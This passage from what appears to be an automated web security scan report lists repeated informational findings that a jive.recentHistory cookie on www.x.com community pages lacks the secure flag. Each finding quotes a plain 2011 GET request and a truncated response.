Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/recurring_billing

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/recurring_billing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031373b31342c323031363b31342c323031353b31342c323234363b31342c323030363b31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:59 GMT; Path=/
Vary: User-Agent
JP: D=113300 t=1313157058930963
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.48. https://www.x.com/community/ppx/recurring_payments

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/recurring_payments

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/recurring_payments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031363b31342c323031353b31342c323234363b31342c323030363b31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:58 GMT; Path=/
Vary: User-Agent
JP: D=126727 t=1313157058403684
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.49. https://www.x.com/community/ppx/release_notes

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/release_notes

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/release_notes HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036343b31342c323033323b31342c323033373b31342c323032323b31342c323033303b31342c323032393b31342c323032383b31342c323036333b31342c323032373b31342c323032363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:04 GMT; Path=/
Vary: User-Agent
JP: D=126133 t=1313157064223215
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.50. https://www.x.com/community/ppx/sdks

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/sdks

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/sdks HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032333b31342c323032343b31342c323036333b31342c323032323b31342c323036343b31342c323033323b31342c323033373b31342c323033303b31342c323032393b31342c323032383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:05 GMT; Path=/
Vary: User-Agent
JP: D=250524 t=1313157065371592
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.51. https://www.x.com/community/ppx/showcase

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/showcase

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/showcase HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/people/BaldGeek
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:55 GMT; Path=/
Vary: User-Agent
JP: D=95160 t=1313156335154548
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.52. https://www.x.com/community/ppx/showcase/ap_directory

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/showcase/ap_directory

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/showcase/ap_directory HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=626237 t=1313157082735465
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.53. https://www.x.com/community/ppx/support

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/support

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/support HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038323b31342c323134323b31342c323134333b31342c323134343b31342c323030353b31342c323134363b31342c323134353b31342c323034373b31342c323034363b31342c323034353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:19 GMT; Path=/
Vary: User-Agent
JP: D=62142 t=1313157079746964
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.54. https://www.x.com/community/ppx/system_status

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/system_status

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/system_status HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032323b31342c323033303b31342c323033373b31342c323032393b31342c323033323b31342c323032383b31342c323036333b31342c323032373b31342c323032363b31342c323032303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:03 GMT; Path=/
Vary: User-Agent
JP: D=141197 t=1313157063543336
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.55. https://www.x.com/community/ppx/testing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/testing

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/testing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033323b31342c323033373b31342c323032393b31342c323033303b31342c323032383b31342c323036333b31342c323032373b31342c323032363b31342c323032303b31342c323031383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:03 GMT; Path=/
Vary: User-Agent
JP: D=129679 t=1313157063076344
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.56. https://www.x.com/community/ppx/training

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/training

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/training HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033343b31342c323032343b31342c323036343b31342c323032353b31342c323032333b31342c323036333b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=90627 t=1313157066413831
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.57. https://www.x.com/community/ppx/transaction_information

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/transaction_information

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/transaction_information HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032363b31342c323032303b31342c323031383b31342c323031373b31342c323036333b31342c323030363b31342c323031363b31342c323234363b31342c323031353b31342c323031333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:00 GMT; Path=/
Vary: User-Agent
JP: D=127710 t=1313157060376316
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.58. https://www.x.com/community/ppx/vt

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/vt

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/vt HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031353b31342c323031333b31342c323234363b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:57 GMT; Path=/
Vary: User-Agent
JP: D=134897 t=1313157057107460
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.59. https://www.x.com/community/ppx/website_reporting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/website_reporting

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/website_reporting HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033303b31342c323032373b31342c323036333b31342c323032383b31342c323032363b31342c323032393b31342c323032303b31342c323031383b31342c323031373b31342c323030363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=106773 t=1313157062233186
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.60. https://www.x.com/community/ppx/wpp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wpp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/wpp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030393b31342c323030333b31342c323030383b31342c323031343b31342c323031303b31342c323031393b31342c323237363b31342c323237303b31342c323030353b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:33 GMT; Path=/
Vary: User-Agent
JP: D=148526 t=1313157033667453
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.61. https://www.x.com/community/ppx/wpphosted

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wpphosted

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/wpphosted HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323234363b31342c323031333b31342c323236393b31342c323031353b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:57 GMT; Path=/
Vary: User-Agent
JP: D=67132 t=1313157057503117
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.62. https://www.x.com/community/ppx/wps

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wps

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/wps HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030363b31342c323031333b31342c323236393b31342c323031353b31342c323031363b31342c323234363b31342c323232313b31342c323235313b31342c323130303b31342c323038343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:58 GMT; Path=/
Vary: User-Agent
JP: D=181388 t=1313157058055328
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.63. https://www.x.com/community/ppx/xspaces

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/showcase
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:39:04 GMT; Path=/
Vary: User-Agent
JP: D=109016 t=1313156344652941
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.64. https://www.x.com/community/ppx/xspaces/accelerator

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/accelerator

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/accelerator HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:53 GMT; Path=/
Vary: User-Agent
JP: D=58190 t=1313157053423426
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.65. https://www.x.com/community/ppx/xspaces/certification

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/certification

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/certification HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035333b31342c323035313b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b31342c323031393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:37 GMT; Path=/
Vary: User-Agent
JP: D=85471 t=1313157037367616
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.66. https://www.x.com/community/ppx/xspaces/cloud-computing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/cloud-computing

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/cloud-computing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131323b31342c323035333b31342c323030373b31342c323035313b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:38 GMT; Path=/
Vary: User-Agent
JP: D=94000 t=1313157038315262
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.67. https://www.x.com/community/ppx/xspaces/digital_goods

Summary

Severity:   Information
Confidence:   Certain
